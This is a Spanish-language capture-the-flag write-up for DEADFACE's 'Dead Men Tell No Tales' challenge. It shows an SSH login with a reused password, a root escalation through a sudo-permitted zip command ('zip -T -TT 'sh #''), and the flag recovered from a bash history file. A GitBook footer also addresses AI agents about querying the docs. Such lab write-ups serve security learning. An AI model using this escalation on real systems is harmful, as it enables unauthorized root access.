> For the complete documentation index, see [llms.txt](https://skymas.gitbook.io/ctf/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://skymas.gitbook.io/ctf/deadface/dead-men-tell-no-tales.md).

# Dead Men Tell No Tales

### Problema

Created by: syyntax

We've discovered a remote system used by DEADFACE. We're not sure what the password is, but we know Donnell Aulner has an account on that machine. We believe DEADFACE has stored valuable information on this machine. The flag exists on the machine in the format flag{some-text-here}. Submit the flag as flag{flag-goes-here}.Username: dracula

deadmen.deadface.io:22

### Solución

Utilizamos la password que obtuvimos en otro chall para ingresar con el usuario de drácula

![Imagen de la flag con la password del user dracula](/files/zVehvBMgYxLSSYC2EWIR)

{% hint style="info" %}
Con esto tenemos el user: dracula y la password: L3t\_*m3*\_in para ingresar
{% endhint %}

```bash
└─$ ssh dracula@deadmen.deadface.io                                                       1 ⨯
dracula@deadmen.deadface.io's password: 
dracula@3d468a1d2ddc:~$ 

```

```
dracula@3d468a1d2ddc:~$ ls -lah /home
total 28K
drwxr-xr-x 1 root      root      4.0K Sep 19 01:37 .
drwxr-xr-x 1 root      root      4.0K Oct 18 04:02 ..
drwxr-xr-x 2 d34th     d34th     4.0K Sep 19 01:37 d34th
drwxr-xr-x 1 dracula   dracula   4.0K Sep 19 01:44 dracula
drwxr-xr-x 1 spookyboi spookyboi 4.0K Sep 19 01:39 spookyboi

```

```
dracula@3d468a1d2ddc:/home$ cd /home/spookyboi/
dracula@3d468a1d2ddc:/home/spookyboi$ ls -la
total 28
drwxr-xr-x 1 spookyboi spookyboi 4096 Sep 19 01:39 .
drwxr-xr-x 1 root      root      4096 Sep 19 01:37 ..
-rw------- 1 spookyboi spookyboi   93 Sep 19 01:39 .bash_history
-rw-r--r-- 1 spookyboi spookyboi  220 Sep 19 01:37 .bash_logout
-rw-r--r-- 1 spookyboi spookyboi 3771 Sep 19 01:37 .bashrc
-rw-r--r-- 1 spookyboi spookyboi  807 Sep 19 01:37 .profile
dracula@3d468a1d2ddc:/home/spookyboi$ cat .bash_history 
cat: .bash_history: Permission denied

```

{% hint style="warning" %}
Encontramos un file interesante pero no tenemos permisos. Busquemos como escalar.
{% endhint %}

```
dracula@3d468a1d2ddc:/home/spookyboi$ sudo -l
Matching Defaults entries for dracula on 3d468a1d2ddc:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dracula may run the following commands on 3d468a1d2ddc:
    (ALL) NOPASSWD: /usr/bin/zip

```

{% hint style="danger" %}
Tiene permisos sudo a ZIP . escalemos permisos con el comando
{% endhint %}

> sudo zip algo /etc/hosts -T -TT 'sh #'

```
dracula@3d468a1d2ddc:/home/spookyboi$ sudo zip algo /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 34%)
# id
uid=0(root) gid=0(root) groups=0(root)
# /bin/bash
root@3d468a1d2ddc:/home/spookyboi#
```

Ya somos Root!. Hora de ir a por mas info

```
root@3d468a1d2ddc:/home/spookyboi# cat .bash_history 
cd ~
echo "flag{c4c089cdbe222b9360880a07c987b581c6f51609}" > flag.txt
rm flag.txt 
exit
exit
root@3d468a1d2ddc:/home/spookyboi# 
```

La flag se encontraba dentro del archivo.

{% hint style="success" %}
flag{c4c089cdbe222b9360880a07c987b581c6f51609}
{% endhint %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://skymas.gitbook.io/ctf/deadface/dead-men-tell-no-tales.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
